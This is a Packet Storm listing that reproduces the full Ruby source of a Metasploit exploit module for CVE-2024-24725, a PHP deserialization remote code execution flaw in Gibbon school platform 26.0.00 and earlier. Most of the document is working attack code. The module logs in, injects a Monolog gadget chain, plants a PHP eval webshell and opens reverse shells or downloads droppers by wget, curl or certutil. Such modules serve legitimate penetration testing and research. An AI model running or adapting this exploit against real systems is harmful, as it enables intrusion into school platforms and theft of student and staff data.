Lucene search
H00die-gr3y, Islam Rzayev, Fikrat Guliev, Ali Maharramli, metasploit.comPACKETSTORM:177944
HistoryApr 05, 2024 - 12:00 a.m.
Gibbon School Platform 26.0.00 Remote Code Execution

2024-04-0500:00:00
h00die-gr3y, Islam Rzayev, Fikrat Guliev, Ali Maharramli, metasploit.com
packetstormsecurity.com
105
gibbon school platform
remote code execution
vulnerability
authenticated users
php deserialization
post request
arbitrary commands
system compromise
data exfiltration
unauthorized access
metasploit module
cve-2024-24725
secondx.io research team
endpoint
online school platform
usernames
password
stability
reliability
sideeffects
6.8 Medium
AI Score
Confidence
Low
0.179 Low
EPSS
Percentile
96.2%
JSON
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
include Msf::Exploit::FileDropper  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Gibbon School Platform Authenticated PHP Deserialization Vulnerability',  
'Description' => %q{  
A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower  
allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a  
POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.  
As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,  
potentially resulting in complete system compromise, data exfiltration, or unauthorized access  
to sensitive information.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor  
'Ali Maharramli', # SecondX.io Research Team - discovery of the vulnerability  
'Fikrat Guliev', # SecondX.io Research Team - discovery of the vulnerability  
'Islam Rzayev' # SecondX.io Research Team - discovery of the vulnerability  
],  
'References' => [  
['CVE', '2024-24725'],  
['URL', 'https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725'],  
['PACKETSTORM', '177635'],  
['EDB', '51903']  
],  
'DisclosureDate' => '2024-03-18',  
'Platform' => ['php', 'unix', 'linux', 'win'],  
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],  
'Privileged' => false,  
'Targets' => [  
[  
'PHP',  
{  
'Platform' => ['php'],  
'Arch' => ARCH_PHP,  
'Type' => :php,  
'DefaultOptions' => {  
'PAYLOAD' => 'php/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Unix Command',  
{  
'Platform' => ['unix', 'linux'],  
'Arch' => ARCH_CMD,  
'Type' => :unix_cmd,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_bash'  
}  
}  
],  
[  
'Linux Dropper',  
{  
'Platform' => ['linux'],  
'Arch' => [ARCH_X64, ARCH_X86],  
'Type' => :linux_dropper,  
'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],  
'Linemax' => 16384,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Windows Command',  
{  
'Platform' => 'win',  
'Arch' => ARCH_CMD,  
'Type' => :windows_cmd,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Windows Dropper',  
{  
'Platform' => 'win',  
'Arch' => [ARCH_X64, ARCH_X86],  
'Type' => :windows_dropper,  
'Linemax' => 16384,  
'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'  
}  
}  
]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'SSL' => true,  
'RPORT' => 443  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
register_options([  
OptString.new('TARGETURI', [ true, 'The Gibbon online school platform endpoint URL', '/' ]),  
OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),  
OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address']),  
OptString.new('PASSWORD', [true, 'Password'])  
])  
end  
  
def gibbon_login  
# construct multipart login form data  
form_data = Rex::MIME::Message.new  
form_data.add_part('', nil, nil, 'form-data; name="address"')  
form_data.add_part('default', nil, nil, 'form-data; name="method"')  
form_data.add_part(datastore['USERNAME'].to_s, nil, nil, 'form-data; name="username"')  
form_data.add_part(datastore['PASSWORD'].to_s, nil, nil, 'form-data; name="password"')  
form_data.add_part('025', nil, nil, 'form-data; name="gibbonSchoolYearID"')  
form_data.add_part('0002', nil, nil, 'form-data; name="gibboni18nID"')  
  
return send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'login.php?timeout=true'),  
'keep_cookies' => true,  
'ctype' => "multipart/form-data; boundary=#{form_data.bound}",  
'data' => form_data.to_s  
})  
end  
  
def construct_form_data(payload)  
# construct multipart form data with payload  
payload_len = payload.length  
payload_data = "a:2:{i:7;O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"\x00*\x00socket\";O:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"\x00*\x00handler\";r:3;s:13:\"\x00*\x00bufferSize\";i:-1;s:9:\"\x00*\x00buffer\";a:1:{i:0;a:2:{i:0;s:#{payload_len}:\"#{payload}\";s:5:\"level\";N;}}s:8:\"\x00*\x00level\";N;s:14:\"\x00*\x00initialized\";b:1;s:14:\"\x00*\x00bufferLimit\";i:-1;s:13:\"\x00*\x00processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}i:7;i:7;}"  
  
form_data = Rex::MIME::Message.new  
form_data.add_part('/modules/System Admin/import_run.php', nil, nil, 'form-data; name="address"')  
form_data.add_part('sync', nil, nil, 'form-data; name="mode"')  
form_data.add_part('N', nil, nil, 'form-data; name="syncField"')  
form_data.add_part('', nil, nil, 'form-data; name="syncColumn"')  
form_data.add_part(payload_data.to_s, nil, nil, 'form-data; name="columnOrder"')  
form_data.add_part('N;', nil, nil, 'form-data; name="columnText"')  
form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"')  
form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"')  
form_data.add_part("#{Rex::Text.rand_text_alpha(8..16)}.xlsx", nil, nil, 'form-data; name="filename"')  
form_data.add_part('"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', nil, nil, 'form-data; name="csvData"')  
form_data.add_part('1', nil, nil, 'form-data; name="ignoreErrors"')  
form_data.add_part('Submit', nil, nil, 'form-data; name="Failed"')  
return form_data  
end  
  
def upload_webshell(b64_payload)  
# randomize file name if option WEBSHELL is not set  
@webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")  
  
# create webshell with base64 encoded PHP payload  
# works for both windows and linux targets  
php_payload = "echo \"<?php @eval(base64_decode(\'#{b64_payload}\'));?>\" > #{@webshell_name}"  
form_data = construct_form_data(php_payload)  
  
# upload webshell  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),  
'keep_cookies' => true,  
'ctype' => "multipart/form-data; boundary=#{form_data.bound}",  
'data' => form_data.to_s  
})  
end  
  
def execute_php(cmd, _opts = {})  
payload = Base64.strict_encode64(cmd)  
res = upload_webshell(payload)  
fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200  
register_file_for_cleanup(@webshell_name)  
  
# execute webshell  
send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, @webshell_name),  
'keep_cookies' => true  
})  
end  
  
def execute_command(cmd, _opts = {})  
form_data = construct_form_data(cmd)  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),  
'keep_cookies' => true,  
'ctype' => "multipart/form-data; boundary=#{form_data.bound}",  
'data' => form_data.to_s  
})  
end  
  
def check  
print_status("Checking if #{peer} can be exploited.")  
res = send_request_cgi!({  
'method' => 'GET',  
'ctype' => 'application/x-www-form-urlencoded',  
'uri' => normalize_uri(target_uri.path)  
})  
return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200  
  
# check if target is running the Gibbon online school platform  
# search for the Gibbon version on the login page  
return CheckCode::Safe('No Gibbon school platform found.') unless res.body.include?('Gibbon')  
  
# trying to get the version  
version = res.body.match(/Gibbon.*v(\d+\.\d+\.\d+)/)  
version_number = version[0].split('v') unless version.nil?  
if version_number  
if Rex::Version.new(version_number[1]) <= Rex::Version.new('26.0.00')  
return CheckCode::Appears("Gibbon v#{version_number[1]}")  
else  
return CheckCode::Safe("Gibbon v#{version_number[1]}")  
end  
end  
CheckCode::Detected  
end  
  
def exploit  
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")  
res = gibbon_login  
fail_with(Failure::NoAccess, "Login failed with user #{datastore['USERNAME']} and password #{datastore['PASSWORD']}.") unless res && res.code == 302  
  
case target['Type']  
when :php  
execute_php(payload.encoded)  
when :unix_cmd, :windows_cmd  
execute_command(payload.encoded)  
when :linux_dropper, :windows_dropper  
# don't check the response here since the server won't respond  
# if the payload is successfully executed.  
execute_cmdstager({ linemax: target.opts['Linemax'] })  
end  
end  
end  
`